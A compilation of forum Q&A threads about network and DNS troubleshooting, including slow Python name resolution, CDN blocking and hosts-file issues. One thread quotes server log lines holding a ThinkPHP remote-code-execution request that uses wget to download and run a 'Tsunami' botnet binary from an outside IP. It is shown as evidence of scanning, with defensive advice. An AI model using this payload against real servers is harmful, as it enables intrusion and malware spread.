Windows DNS problem with Python socket.getaddrinfo() - python-3.x

I have DNS problems with my Python scripts, but not with network tools or browser on my Windows 10 desktop.
Running my scripts every network request takes at least 5-10 seconds. Profiling with py-spy with the --idle flag identified socket.getaddrinfo() as the function spent most time in. I tested in the Python REPL with following command:
socket.getaddrinfo("example.org", 80, proto=socket.IPPROTO_TCP)
It took around 5-10 seconds to return. Setting fixed DNS server in my active network interface did change anything.
Rebooting fixes the problem and brings down the respons time below second times. But after keeping the computer up for some days, the problem returns.
It looks like socket.getaddrinfo hits some timeout and then resolves with the correct DNS.
nslookup works just fine. Response time in ms. Also internet surfing in browsers works just fine.
Any ideas where I could start to dig?

What are you trying to accomplish?
Resolving a Domain Name to an IP address?
simply try:
socket.gethostbyname("example.com")
check which dns servers are configured (in cmd- ipconfig /all, DNS Servers category).
Try using a propriety python DNS client, see if the problem persists.
e.g. dnspython
(See this answer -
Socket resolve DNS with specific DNS server)

Related

Python 3 http.server - A strange IP address tried to connect my server

Several minutes ago, I ran a python-based server to share a few files with my friend. I disabled the windows firewall so that he could connect and download the files. When someone tries to connect the server, Python shows their IP address and the path they requested.
Someone whom I don't know tried to get my index.php and run wget. I checked their IP address and it seems like they're from Japan. So, how does this person knew my IP address and tried to connect to my computer? I've only shared it with my friend on WhatsApp.
I've done this many times before and this is the first time something like this happens.
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
There are many people out there running tools like Masscan with custom scripts looking for vulnerable web servers. Most of the time this kind of script are trying to get reverse shells in an attempt to build botnet armies. There are some relates of windows machines connected to internet being hacked before SO finish its installation as well.
This is a pretty common hacking technique. Hackers will scan the internet using seemingly random ip addresses (and happened to pick yours out) and look for open ports (usually common ports like 22, 80 and 443) and run a bunch of common exploits in efforts to gain control over the machine.
Many of the botnet's were created by just attacking random ip addresses hoping that they would have a router with default username and password still set on their router, or with out of date software with known exploits.
In your case it looks like they were hoping that your web server was running a certain combination of PHP software. Your ip address was probably one of thousands that they ran the same query against.
This is why you shouldn't disable your firewall: the average time it takes from going online without protection to someone trying to crack into your system is at best minutes.
Instead, you should find out the IP of your friend, and just allow that single IP. And unless your friend has a static IP address, remove that allow after they're done testing, because someone else could get that address later.

This webpage is not available, The connection to xxx.domain.pl was interrupted, only first pageload

I'm experiencing odd error while trying to load my web page in browser. When I haven't opened it for some period of time and then try to open it just by typing address in browser and clicking enter:
1) The page doesn't load - browser message that it is not available, connection to .... was interrupted
(in Opera there is also info about proxy, network... i can paste it later when error repeat again)
2) after refreshing, loading page again it works ok (without any problem)
My web page address is crib.pl and subdomains niemiecki.crib.pl, hiszpanski.crib.pl
it is important to note that when i try first time load for example niemiecki.crib.pl then it doesn't open but next opening hiszpanski.crib.pl will open normaly also.
Some additional info:
- hosting is in bluehost (Utha, USA)
- I'm trying to access this from (Poland, Europe)
- website is on drupal
- it works for more than 4 years without problem on this server
- it works even week ago without a problem and it doesn't work since 31 december 2014
- bluehost support doesn't have any idea, they say it works perfectly 1-to-1 cases (no problem)
(If you can check it and type your country and whether yes/no you are expiriencing similar problem)
- I haven't modified anything on the web page (problem just happens without my interaction)
- Google crawlers seems to have some problems with accessing robots.txt (sth like that) file
- domain is hosted by company in Poland (crib.pl) and this domain is set using external DNS to bluehost.com servers
Any help save my life, I'm experiencing about 50% drop in earnings since this problem!
Opera message:
"
This webpage is not available
The connection to crib.pl was interrupted.
Check your internet connection.
Check any cables and reboot any routers, modems, or other network devices you may be using.
Allow Opera to access the network in your firewall or antivirus settings.
If it is already listed as a program allowed to access the network, try removing it from the list and adding it again.
If you use a proxy server...
Check your proxy settings or contact your network administrator to make sure the proxy server is working. If you don't believe you should be using a proxy server: Go to Applications > System Preferences > Network > Advanced > Proxies and deselect any proxies that have been selected.
"
There is definitely something wrong with the Bluehost box (i.e. the server behind the IP address 66.147.244.170). From Australia at 2015-Jan-05 12:19:36 UTC, I was able to reproduce a "Connection reset by peer" error just using curl, which corresponds to the browser message "connection to .. was interrupted".
Other times, it just hangs while trying to establish a connection.
In addition, other servers on the same subnet also owned by Bluehost appear to be working fine.
For example:
$ telnet 66.147.244.22 80
Trying 66.147.244.22...
Connected to 66-147-244-22.unifiedlayer.com.
Escape character is '^]'.
^]
telnet> q
Connection closed.
This tells me that it is not a routing problem on the public Internet either.
Also, after a while I tried again it succeeded in opening a connection. So, you're right that the problem is intermittent.
In other words, I think the issue lies with this particular Bluehost box. It could be one of the following causes:
OS is out of file descriptors
Apache or whatever mail server is too slow to service requests and therefore has maxed out its listen backlog
other server resource limits (perhaps memory) or network equipment issue localized to the hosting environment
Best to check with Bluehost again. My guess is that one of the other tenants sharing that server is getting heavily loaded periodically.
Yes, as I thought before the problem was with bluehost box.
Now seems that the problem has been fixed. Here's what I have done:
1) I upgraded bluehost account (standard shared to pro shared)
I do this because want to change IP address and bluehost box without changing crib.pl
domain external DNS servers configurations (it is set to bluehost)
I also would like to have automatic migration, because haven't too much time now.
2) After upgrade I get new IP address and new bluehost box but it also didn't work correctly
3) So I switch on dedicated IP option and after that about 6 hours later when dedicated IP was propageted properly website seems to work again correctly (one problem it cost me about 120$ for next year and shortening my plan for 1 year then previously)
4) the most frustrating issue was bluehost technical support approach which wasn't eager to help me in any why even though the problem was in their server configuration not my code !

Can't access cloudfront and fastly files, web sites not loading

Note: this problem is independent of wire/wireless, iPad (with Google DNS)/Linux/Windows
I can't access several sites including stackoverlow (cdn.sstatic.net), aws.amazon.com (d36cz9buwru1tt.cloudfront.net), heroku, github etc for 3 days from Turkey with ISP Superonline.
When I try to enter aws.amazon.com, browser downloads html and some images properly but can't download some of them, those hosted on d36cz9buwru1tt.cloudfront.net or subdomains like that.
Chrome says several images from this subdomain are pending. So the web page loading never finishes.
I can't access http://d36cz9buwru1tt.cloudfront.net, it keeps loading for a while (30 sec to minutes). But when I use proxy over Amsterdam, it loads immediately.
Without proxy, I can get its IP with ping:
64 bytes from server-54-240-162-83.fra6.r.cloudfront.net (54.240.162.83): icmp_req=1 ttl=53 time=58.2 ms
While writing these, the previous URL became available after several hours and now github.com can't be accessed due to css files on its CDN: https://github.global.ssl.fastly.net/assets/github2-f227c0e7c55002ba0645fc8d3761d00bce36e248.css
$ wget https://github.global.ssl.fastly.net/assets/github2-f227c0e7c55002ba0645fc8d3761d00bce36e248.css
--2013-11-19 21:39:32-- https://github.global.ssl.fastly.net/assets/github2-f227c0e7c55002ba0645fc8d3761d00bce36e248.css
Resolving github.global.ssl.fastly.net (github.global.ssl.fastly.net)... 185.31.17.184, 185.31.17.185
Connecting to github.global.ssl.fastly.net (github.global.ssl.fastly.net)|185.31.17.184|:443... connected.
...
...
waits but no response.
What could be the cause of this problem? My ISP did not help.
UPDATE: Changing my IP has solved the problem. Seems like someone using that IP before me got banned by Cloudfront.
I also had the exact same problem, Changing the DNS solved the issue. For me Coursera wasn't opening, neither 9GAG.
Changed my default DNS server provided by my ISP to the one given by google i.e.
8.8.8.8 and 8.8.4.4
I hope this solves your issue as well.
It seems there is a lot of problems with some ISPs and DNS resolution on CloudFront. See this https://forums.aws.amazon.com/thread.jspa?messageID=263168
Have you tried to change your DNS?
I also have the exactly same problem; same situation as you.
I think we really experience exactly the same. (but for me happen just today)
I first noticed problem on cloudfront then fastly then I can connect to cloudfront but fastly.
To answer your question I have a possible speculation about the root of the problem.
However, if this speculation is true the issue can't be solved on our end.
I think it's because of LSN (or NAT444, CGN) that installed in ISP network.
(ISP don't want customers to notice this change.)
To check if this speculation is plausible please check your modem/router
if the IP address received from ISP is in this block 100.64.0.0/10
then that should explain the phenomenon.
My ISP recently deploy LSN short before this problem arise.
I think IP address pool in LSN is too small (poorly deploy by ISP) so too many users share the same IP address.
this cause CDN networks to think they got DOS attack from particular IP address.
then CDN networks will temporary block (or null route) the LSN IP address.
some note: I'm sure this is not about the DNS because fastly deploy some trick called "round robin DNS" to use with "client retry" and I tried connect more than one IP address from fastly and also check that the values (All A records received) are correct.
To workaround the issue you can setup SOCKS proxy on a VPS and write PAC script to redirect some traffic thru the proxy.

Domains not loading - server working fine...any ideas?

I run a high volume website and since yesterday it's not working.
My server (for example) 100.0.0.1 is working fine, I can access WHM etc, rootssh no problem....
Yet none of the domains are working, they say cannot find page.
I have my name server setup at Godaddy using domainname.com
Pointing to 3 IPS, 100.0.0.1, 100.0.0.2, 100.0.0.3
All my domains then have ns1.domainname.com, ns2.domainname.com, ns3.domainname.com
As their Nameserver entries.
This was working fine yesterday, now...nothing.
Any ideas on what I can do? Troubleshoot.
Thank you, I am losing alot of trade as I run an high traffic eCommerce website, so would like to get this fixed as soon as possible.
Have you tried using the IP of the server instead of the domain name? Could roll out a DNS issue. You said you can gain root access fine.
Have you checked your firewall to ensure the correct ports are still open?
If you run a netstat command to check what type of traffic is occurring.
Run this command and then try to access the domain or IP to see if the connection is established or if the service is listening. (watch -n 1 netstat -nat)

Host file set, ping goes 127.0.0.1, but in browser URL still goes out to web?

Having some issues running my code local.
I have host file setup like this:
127.0.0.1 ryan.local.myappname.com
if I ping that URL it kicks back from 127...
but if I browse there in firefox or IE it takes me to an old version of the site that is currently live instead of taking me to the local one...
I am running Windows 7
Any ideas?
copied: https://serverfault.com/questions/65903/host-file-set-ping-goes-127-0-0-1-but-in-browser-url-still-goes-out-to-web
A common reason for this problem is that you're using a proxy that does the DNS resolving for you. This way your browser never tries to resolve the host name, but simply passes it on to the proxy, which of course doesn't use your host file entry.
Answer per serverfault:
ipconfig /flushdns
Worked like a charm.

Resources